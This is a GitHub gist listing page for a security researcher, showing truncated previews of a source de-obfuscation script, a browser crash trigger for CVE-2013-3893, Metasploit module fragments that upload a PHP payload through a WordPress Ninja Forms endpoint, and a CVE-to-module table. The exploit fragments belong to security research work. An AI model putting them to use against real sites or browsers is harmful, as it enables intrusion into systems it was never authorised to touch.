Skip to content

Instantly share code, notes, and snippets.

sinn3r wchen-r7

Block or report user

Report or block wchen-r7

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View decrypt_github_enterprise.rb
#!/usr/bin/ruby
#
# This tool is only used to "decrypt" the github enterprise source code.
#
# Run in the /data directory of the instance.
require "zlib"
require "byebug"
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+
View gist:cbb6b47f096eb4fd4a7c1c53d43d574f
### Keybase proof
I hereby claim:
* I am wchen-r7 on github.
* I am wchenr7 (https://keybase.io/wchenr7) on keybase.
* I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7
To claim this, I am signing this object:
View cve_2013_3893_trigger.html
<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
View gist:701269eaf9ce2c17ad3888e18ce12248
def fetch_ninja_form_nonce
uri = normalize_uri(target_uri.path, datastore['FORM_PATH'])
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
)
puts res.body
fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200
res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1]
View gist:f1eabf17cb1f9f5a655b879d42c39682
def generate_mime_message(payload_name, nonce)
puts "--- You have nonce: #{nonce.inspect}"
data = Rex::MIME::Message.new
data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
data.add_part(nonce, nil, nil, 'form-data; name="security"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
data
end
View gist:7047590
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "IE test",
View gist:6774619
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
View gist:3d8b95aa9f3e14df8d65
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
load "./lib/msf/core/exploit/exe.rb"
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
View gist:d79e10fbd26cb1c8d50b
CVE,Module
"CVE-2013-4011","aix/local/ibstat_path"
"CVE-2009-3699","aix/rpc_cmsd_opcode21"
"CVE-2009-2727","aix/rpc_ttdbserverd_realpath"
"CVE-2012-6636","android/browser/webview_addjavascriptinterface"
"CVE-2013-4710","android/browser/webview_addjavascriptinterface"
"CVE-2014-0514","android/fileformat/adobe_reader_pdf_js_interface"
"CVE-2014-3153","android/local/futex_requeue"
"CVE-2006-3459","apple_ios/browser/safari_libtiff"
"CVE-2006-3459","apple_ios/email/mobilemail_libtiff"
You can’t perform that action at this time.